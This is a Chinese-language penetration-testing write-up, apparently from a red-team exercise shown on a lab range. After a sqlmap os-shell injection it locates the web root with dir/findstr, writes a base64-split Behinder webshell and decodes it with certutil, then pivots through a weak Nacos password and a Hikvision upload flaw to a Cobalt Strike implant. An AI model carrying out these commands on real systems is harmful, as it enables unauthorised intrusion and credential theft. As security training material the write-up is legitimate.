本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!
某次hvv打点遇到的,这里我用靶场作为演示为大家提供一个sqlmap注入后,找网站绝对路径的思路。
前提:sqlmap注入可以使用os-shell,且为dba权限。
fsutil fsinfo drives //先看系统都有哪些盘
这里可以找一张图片然后通过find命令来寻找它的路径(这里我选择找网站的一个背景图)。
![]()
dir /a /s /b C:\ | findstr "loginbg.jpg" >111.txt //在C盘中查找loginbg.jpg
type 111.txt
返回空,说明网站根目录不在C盘![]()
dir /a /s /b D:\ | findstr "loginbg.jpg" >111.txt //在D盘中查找loginbg.jpg
type 111.txt
成功找到目录猜测为1和2,我选择写到D:\xxx\Content\image目录下
![]()
。
1.将冰蝎webshell进行base64加密,分成4段进行传输。
2.解密冰蝎马
certutil -decode
D:\xxx\Content\images\Test.txt
D:\xxx\Content\images\text2.aspx
//第一个路径为写入webshell的txt绝对径,第二个路径是生成冰蝎马的路径(一定要在网站绝对路径下)
这里我之前解密过一次,所以提示文件存在。![]()
![]()
。
扫描内网网段发现nacos,好家伙弱口令,直接读到数据库密码,连上数据库。![]()
好家伙,内网还有海康威视文件上传,传马,上线CS。
![]()
这里可以找一张图片然后通过find命令来寻找它的路径(这里我选择找网站的一个背景图)
。
🌟 诚邀您点赞!点亮我们共同的故事,为我们的公众号加油!🔥🔥🔥
亲爱的读者,您的一个赞,对我们来说是无比的鼓励和动力。每一次点赞,都是您对我们内容的认可和支持,也是我们持续创作的动力源泉。
在点赞的同时,也请您分享我们的内容给更多的朋友,让更多的人了解我们的公众号,一起分享知识和快乐。您的支持,是我们前行的最大动力!🚀🚀🚀
让我们一起,为知识点赞,为生活点赞,为梦想点赞!🌟🌟🌟
